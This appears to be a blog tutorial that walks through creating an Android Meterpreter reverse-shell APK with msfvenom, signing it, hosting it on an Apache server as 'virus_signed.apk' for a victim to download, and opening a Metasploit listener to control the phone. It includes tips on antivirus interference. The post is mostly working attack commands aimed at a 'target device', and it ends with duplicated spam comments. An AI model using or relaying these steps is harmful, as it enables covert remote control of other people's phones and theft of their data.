Hack an Android device with MSFvenom and Kali Linux
Theresa Underwood
Sep 10, 2021
9 min to read
There are different ways and tools to hack an Android device, in this post, I will focus on MSFvenom to generate an APK which will be installed on the target device and the Metasploit console to set up a listener which will be used to interact with the device through the APK installed. Keep in mind that the payload used is not going to work with every Android version, mostly with the recent one
There are different ways and tools to hack an Android device, in this post, I will focus on MSFvenom to generate an APK which will be installed on the target device and the Metasploit console to set up a listener which will be used to interact with the device through the APK installed. Keep in mind that the payload used is not going to work with every Android version, mostly with the recent ones. The main purpose is to show how create a payload and setup a listener, after that we just need to create a server where the victim will download the virus. I found many other tutorials on Google about this topic but they are extremely old and they don’t even tell you the Kali version used. You might think that is not important, but when I was looking to learn how to use MSFvenom, many parameters used were not working. Here is a simple example:
$ msfvenom –p android/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 R > virus.apk
So why this is wrong in the first place ? If we paste this command in our terminal, we get this error:
Error: No options
As you can see something is not correct, more specifically “R” is not recognized as a parameter, technically this should create our APK as an output file, but if we check the official documentation on the Offensive Security website, we can clearly see that the correct parameter to use is “-o”:
This is just a simple tip to take these tutorials as they are right now, because after one year they could already be outdated, even this tutorial created by me of course. If something is not working, check the documentation.
Requirements
It should be obvious but these are the tools required:
An Android device (if you do not have an Android phone, use a VM or an emulator like Bluestacks)
You have already installed Kali Linux but you don’t remember the correct version ? No problem, use this command in the terminal:
$ lsb_release -a
And you should get the following output:
No LSB modules are available.
Distributor ID: Kali
Description: Kali GNU/Linux Rolling
Release: 2021.1
Codename: kali-rolling
Create the payload
Instead of typing 7 different commands in the terminal one by one, we can simply create a shell script to do the job. Open the terminal and use the following command to create a file:
$ touch createThePayload.sh
Make the script created an executable with:
$ chmod +x createThePayload.sh
Copy and paste the following code (of course you have to set your IP and a port like 4444):
Type ./createThePayload.sh and hit enter to execute the script, check the output in the terminal to see if everything is correct.
A quick explanation about the commands used
With MSFvenom we set the payload, the host which is our IP, the port and the output as “virus.apk”.
The key tool command is a key and certificate management utility. We set the key store file to generate, an alias like hacked but you can use what you want just keep in mind this alias when you are using the jarsigner command, the algorithm like RSA, the key size, the validity.
We have to install two packages, default-jdk to use the jarsigner in order to sign and verify a Java Archive, zipalign which is an archive alignment tool that provides important optimization to Android application (.apk) files. We set the parameter “-y” to automatically answer with “yes” to the prompt in the terminal. We need to sign a certificate because Android mobile devices are not allowed to install apps without the appropriately signed certificate. Android devices only install signed .apk files.
Setup the server
Now to download the APK on a target machine, we could use a server with Apache, from here we just need to go the correct url, which is something like “192.168.1.2/virus_signed.apk”. In order to move the APK created by the script in “/var/www/html”, we need root permissions. Besides using a command like:
You could also use the following command when you know you will be running various commands that need root access and don’t want to run each of them with sudo:
$ sudo -i
Check if the apache2 service is running with:
$ service apache2 status
If you get the following output:
● apache2.service - The Apache HTTP Server
Loaded: loaded (/lib/systemd/system/apache2.service; disabled; vendor preset: disabled)
Active: inactive (dead)
Docs: https://httpd.apache.org/docs/2.4/
Start the service with:
$ sudo service apache2 start
If we open Firefox and type the IP of our machine (you can get the IP with the terminal by typing ifconfig), we get the Debian Page:
And if we search our apk file in the website directory, we can download it:
Setup the listener
And now we have to set our listener with the msfconsole, we set the exploit, the payload and the host. The port is already set as 4444 but you change it. After that we will run it and we will download the apk on a mobile device or an emulator, in my case I used my phone. Follow these steps to set the listener:
Start the msfconsole:
$ msfconsole
When the console is ready, type this command (it should be obvious but don’t copy “msf >” in the terminal):
$ msf > use exploit/multi/handler
Set the host:
$ msf > set lhost TypeYourIPHere
Set the payload:
$ msf > set payload android/meterpreter/reverse_tcp
Run the exploit:
$ msf > run
Download the apk on the phone, you need to make sure that your Kali machine and your Android device are on the same network.
Let’s test some commands
Some commands will not work, but the main purpose of this video is to show how to make this stuff work, you can always change the payload or even make your own payload. Here is a quick demo:
With this post you should be able to create a payload for Android, setup a server and a listener to make everything work perfectly. As you can see in the demo, the antivirus is preventing us from installing the APK, in some cases it can also close the connection to our Kali machine. There are other cases where the connection will be closed, unfortunately there isn’t a single solution so you will need to try different approaches. Try to check if the architecture used to create the APK is the same used by Android and of course if the antivirus is preventing the payload to work correctly.
Comments:
Sophie Asveld
February 14, 2021
Email is a crucial channel in any marketing mix,
and never has this been truer than for today’s entrepreneur. Curious
what to say.
Ariana Gerad
February 14, 2021
Email is a crucial channel in any marketing mix,
and never has this been truer than for today’s entrepreneur. Curious
what to say.
Sophie Asveld
February 14, 2021
Email is a crucial channel in any marketing mix,
and never has this been truer than for today’s entrepreneur. Curious
what to say.
Sophie Asveld
February 14, 2021
Email is a crucial channel in any marketing mix, and never has this been truer than for today’s entrepreneur. Curious what to say.
Ariana Gerad
February 14, 2021
Email is a crucial channel in any marketing mix, and never has this been truer than for today’s entrepreneur. Curious what to say.
Sophie Asveld
February 14, 2021
Email is a crucial channel in any marketing mix, and never has this been truer than for today’s entrepreneur. Curious what to say.